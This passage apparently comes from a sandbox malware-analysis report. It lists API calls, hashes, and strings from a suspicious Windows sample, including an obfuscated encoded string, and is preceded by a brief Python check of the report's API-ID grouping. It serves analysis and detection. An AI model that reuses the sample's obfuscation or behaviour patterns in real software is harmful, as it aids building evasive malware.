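        print("match" if ok else "MISMATCH", rebuilt, "| kill pattern:", flags_process_kill(rec))
```

Pasting other records from this page into SAMPLE is the quickest way to probe the rule: a mismatch means the inferred grouping does not cover that record (for example a name whose CamelCase pieces are all shorter than four characters), not that the report is wrong. The "Part of subcall function" entries must be kept, since the report's own IDs count them (DeleteObject and AttachThreadInput appear in the IDs above only through subcalls).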
                                                        APIs
                                                        • _memset.LIBCMT ref: 008472AA
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00847351
                                                        • IsMenu.USER32(?), ref: 00847369
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008473B1
                                                        • DrawMenuBar.USER32 ref: 008473C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0$0R
                                                        • API String ID: 3866635326-488941688
                                                        • Opcode ID: 4edbfdbbde350ef7c014f338603476460af0be29795c53789d187c983fca5d1f
                                                        • Instruction ID: e58bdddfb371fc72d2f0960db9341399f6e576973ad79cbcdab2f3ade6f0e7f9
                                                        • Opcode Fuzzy Hash: 4edbfdbbde350ef7c014f338603476460af0be29795c53789d187c983fca5d1f
                                                        • Instruction Fuzzy Hash: C7411375A04208EFDB20DF64D884AAABBF8FB09314F548529FD15EB350D730AD50DB60
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00823033
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: a56ac71c98e9be54c876d8bbb1822bb14e049bf330d51bcb34d91e74a727d2ef
                                                        • Instruction ID: ebe1d2dcd574e77dc519a9ef8ade9265adff6a2a43b7aba1033dba466dc5634d
                                                        • Opcode Fuzzy Hash: a56ac71c98e9be54c876d8bbb1822bb14e049bf330d51bcb34d91e74a727d2ef
                                                        • Instruction Fuzzy Hash: 831108313887A6FEE7159B15EC5AC6B779CFF19324B10402AF904E6282DA7C9F8055B4
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00824312
                                                        • LoadStringW.USER32(00000000), ref: 00824319
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0082432F
                                                        • LoadStringW.USER32(00000000), ref: 00824336
                                                        • _wprintf.LIBCMT ref: 0082435C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0082437A
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00824357
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 502cf417e32ed042e8a69c0944231c42e62fc5f6128aa4a0056f014a6bc98822
                                                        • Instruction ID: 098a9a720713a901835de0e3078ba6b65ff5f9e8ca80f755f5d7f2961555d63f
                                                        • Opcode Fuzzy Hash: 502cf417e32ed042e8a69c0944231c42e62fc5f6128aa4a0056f014a6bc98822
                                                        • Instruction Fuzzy Hash: 42018FF6900218BFE711D7A0DD8DEE7776CFB09301F0001A5BB09E2152EA349E848B70
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007FC1C7,00000004,00000000,00000000,00000000), ref: 007C2ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007FC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 007C2B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007FC1C7,00000004,00000000,00000000,00000000), ref: 007FC21A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007FC1C7,00000004,00000000,00000000,00000000), ref: 007FC286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: abe143c8a0ee30ba16d8116303f4772d9148f6c215e9ce2741aba0c4c844c60d
                                                        • Instruction ID: ee0a64d5822525b5016db770dd4597dbda943a2a00a4ca47c1ace0487199048a
                                                        • Opcode Fuzzy Hash: abe143c8a0ee30ba16d8116303f4772d9148f6c215e9ce2741aba0c4c844c60d
                                                        • Instruction Fuzzy Hash: DD41E830604684AADB3A9B288D8CF7F7B92FB46310F14C81DEA47866A3C67D9853D711
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 008270DD
                                                          • Part of subcall function 007E0DB6: std::exception::exception.LIBCMT ref: 007E0DEC
                                                          • Part of subcall function 007E0DB6: __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00827114
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00827130
                                                        • _memmove.LIBCMT ref: 0082717E
                                                        • _memmove.LIBCMT ref: 0082719B
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 008271AA
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008271BF
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 008271DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: 8b65689fef1845f7ced17982c0ceb09825aea7b33cdffe7ef746f50733c204fd
                                                        • Instruction ID: 594418c872505eb098d82b13375dd23b9f070d5095a2645cc1b9cc295f2911f5
                                                        • Opcode Fuzzy Hash: 8b65689fef1845f7ced17982c0ceb09825aea7b33cdffe7ef746f50733c204fd
                                                        • Instruction Fuzzy Hash: DB316E35900215EBDB00EFA5DC899ABB7B8FF49310F1441B9F904EB256DB749E50CBA0
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 008461EB
                                                        • GetDC.USER32(00000000), ref: 008461F3
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008461FE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0084620A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00846246
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00846257
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0084902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00846291
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008462B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: 17435ddc52f1d3f005503aa7c414b1f710340223244c1ee3c33ae8ae7aa9bdbb
                                                        • Instruction ID: c056be0bed7c0cd084e9388999bad1f615f25d0d1dc0497e7cf68b6ba726a1fa
                                                        • Opcode Fuzzy Hash: 17435ddc52f1d3f005503aa7c414b1f710340223244c1ee3c33ae8ae7aa9bdbb
                                                        • Instruction Fuzzy Hash: 2E318D76201214BFEB118F10CC8AFEB3BA9FF5A765F050065FE08DA192D6B59C51CB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 07b8bfecd71b32164d1eceba529289b8412052034c8a7db921a1fe3774397317
                                                        • Instruction ID: 74a5530c9eaad43b6fa7666be4d8c4b80f459551700ac2342337d3ce71b0c8eb
                                                        • Opcode Fuzzy Hash: 07b8bfecd71b32164d1eceba529289b8412052034c8a7db921a1fe3774397317
                                                        • Instruction Fuzzy Hash: 5721AFB260628DBBA60466129D42FFB735DFF1636CB044020FD04DAB83EF28DE5581A1
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                          • Part of subcall function 007DFC86: _wcscpy.LIBCMT ref: 007DFCA9
                                                        • _wcstok.LIBCMT ref: 0082EC94
                                                        • _wcscpy.LIBCMT ref: 0082ED23
                                                        • _memset.LIBCMT ref: 0082ED56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: 5e72d984f3660a7d8051e33d113c3cdf9448edcb2718ac8e07af0fb7e7ac2564
                                                        • Instruction ID: 1bdc278204ef7db93de178c46637afa30c5dea1b767ea812cbdee3991b5b1fd0
                                                        • Opcode Fuzzy Hash: 5e72d984f3660a7d8051e33d113c3cdf9448edcb2718ac8e07af0fb7e7ac2564
                                                        • Instruction Fuzzy Hash: E9C16A71508251DFC764EF24D889E5AB7E4FF85310F00492DF9999B2A2DB34EC85CB86
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a59188042c2bca48ec86abffc2e6557e4527bcac107d554a5c219f168f5b116
                                                        • Instruction ID: cf883f1a318ee39ee80b6fc80363259dd7625413381ddb30293f9614582a9404
                                                        • Opcode Fuzzy Hash: 2a59188042c2bca48ec86abffc2e6557e4527bcac107d554a5c219f168f5b116
                                                        • Instruction Fuzzy Hash: 6A716C34900149EFCB04DF98CC48EBEBB79FF86314F54816DF915AA252C738AA51CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7377f2cc35d067b023b2bd7c64d5ce19d81f82fa6bde17bfe4d09df02790148
                                                        • Instruction ID: 445dc007c46802c9856cea2a267b689e224ba99aae0324b8e38d097290388b97
                                                        • Opcode Fuzzy Hash: b7377f2cc35d067b023b2bd7c64d5ce19d81f82fa6bde17bfe4d09df02790148
                                                        • Instruction Fuzzy Hash: 74619D71204200BBC750EB28CC89F6BB7A8FFD4714F14891CF556DB292EA75AD44CB92
                                                        APIs
                                                        • _memset.LIBCMT ref: 0083F448
                                                        • _memset.LIBCMT ref: 0083F511
                                                        • ShellExecuteExW.SHELL32(?), ref: 0083F556
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                          • Part of subcall function 007DFC86: _wcscpy.LIBCMT ref: 007DFCA9
                                                        • GetProcessId.KERNEL32(00000000), ref: 0083F5CD
                                                        • CloseHandle.KERNEL32(00000000), ref: 0083F5FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: a78a0758e49251083b0814cc04a08789d30d4a45adfe8d2d66681f7880f078b4
                                                        • Instruction ID: b3bed76ffcde3804d8890353fd952e7953d5d20916c85ed190244da78a6b189c
                                                        • Opcode Fuzzy Hash: a78a0758e49251083b0814cc04a08789d30d4a45adfe8d2d66681f7880f078b4
                                                        • Instruction Fuzzy Hash: 37618B75A00619DFCB04DF64C489AAEB7F5FF49310F14806DE956AB352CB34AD41CB90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00820F8C
                                                        • GetKeyboardState.USER32(?), ref: 00820FA1
                                                        • SetKeyboardState.USER32(?), ref: 00821002
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00821030
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0082104F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00821095
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008210B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 7d639d08948e71ee41d5b7470d2f974adec3c1329d7b16918caf864ab277031c
                                                        • Instruction ID: 8b50e29d4f8d0298aace2c8ae56c9b261d61b81ea50c971f7ca0452391c555b9
                                                        • Opcode Fuzzy Hash: 7d639d08948e71ee41d5b7470d2f974adec3c1329d7b16918caf864ab277031c
                                                        • Instruction Fuzzy Hash: C15104A0644BE53DFF3642349C09BB6BEA9FB16304F184589E1D4C58D3C6A4ECD4DB51
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00820DA5
                                                        • GetKeyboardState.USER32(?), ref: 00820DBA
                                                        • SetKeyboardState.USER32(?), ref: 00820E1B
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00820E47
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00820E64
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00820EA8
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00820EC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 203672d39a39c547f3281ee43c3cb41640877f4cca76f077f979b6d90eed381d
                                                        • Instruction ID: 29bf30ac32270dc80c0128b2e8355799cbacb572680575f9053b431f54c74ce0
                                                        • Opcode Fuzzy Hash: 203672d39a39c547f3281ee43c3cb41640877f4cca76f077f979b6d90eed381d
                                                        • Instruction Fuzzy Hash: 0151E4A05486E57DFB3283649C45B7ABEA9FB06300F088989F1D4C68C3D795ACD8DB61
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: f5524af16da64d84b65242a8f2fcdbabf33a892c3bfed89e15df12784ef27301
                                                        • Instruction ID: 9f57cd1b9a48cb1d10d2ac271629a07b08df9d3281a07db9085802893a99b072
                                                        • Opcode Fuzzy Hash: f5524af16da64d84b65242a8f2fcdbabf33a892c3bfed89e15df12784ef27301
                                                        • Instruction Fuzzy Hash: AB41DA65C52258B6CB11EBB59C4EACFB3BCEF08310F504465E504E3221FB38A295C7A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0R
                                                        • API String ID: 0-1916035689
                                                        • Opcode ID: c5827994f23da146ccba1b09e564ec6ef31c0a89820759dd4478d37f8dd57e00
                                                        • Instruction ID: 9ad38086d8bdd399b2bb7b430e0ef3494a41e1a834e5b8679c51979d98047c0a
                                                        • Opcode Fuzzy Hash: c5827994f23da146ccba1b09e564ec6ef31c0a89820759dd4478d37f8dd57e00
                                                        • Instruction Fuzzy Hash: 6B41C63598451CEFD728DF28CC88FAABBA8FB09310F150169F916EB2E1D7709D41DA51
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 007C2357
                                                        • ScreenToClient.USER32(008857B0,?), ref: 007C2374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 007C2399
                                                        • GetAsyncKeyState.USER32(00000002), ref: 007C23A7
                                                        Strings
                                                        • dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew, xrefs: 007FBFF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID: dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew
                                                        • API String ID: 4210589936-3792667901
                                                        • Opcode ID: 0265bb30a4d66b5328bef50f49600a8043a5a608466320c6a727f75a3ba1f896
                                                        • Instruction ID: d14298349b0600773d5cec1fe33058fe1a57b9647abdfe4ee10964242ac6fefd
                                                        • Opcode Fuzzy Hash: 0265bb30a4d66b5328bef50f49600a8043a5a608466320c6a727f75a3ba1f896
                                                        • Instruction Fuzzy Hash: 50417F35604109FBDF169F68CC44FE9BBB4FB05360F20431EF929922A1CB399951DB91
                                                        APIs
                                                          • Part of subcall function 0082466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00823697,?), ref: 0082468B
                                                          • Part of subcall function 0082466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00823697,?), ref: 008246A4
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 008236B7
                                                        • _wcscmp.LIBCMT ref: 008236D3
                                                        • MoveFileW.KERNEL32(?,?), ref: 008236EB
                                                        • _wcscat.LIBCMT ref: 00823733
                                                        • SHFileOperationW.SHELL32(?), ref: 0082379F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
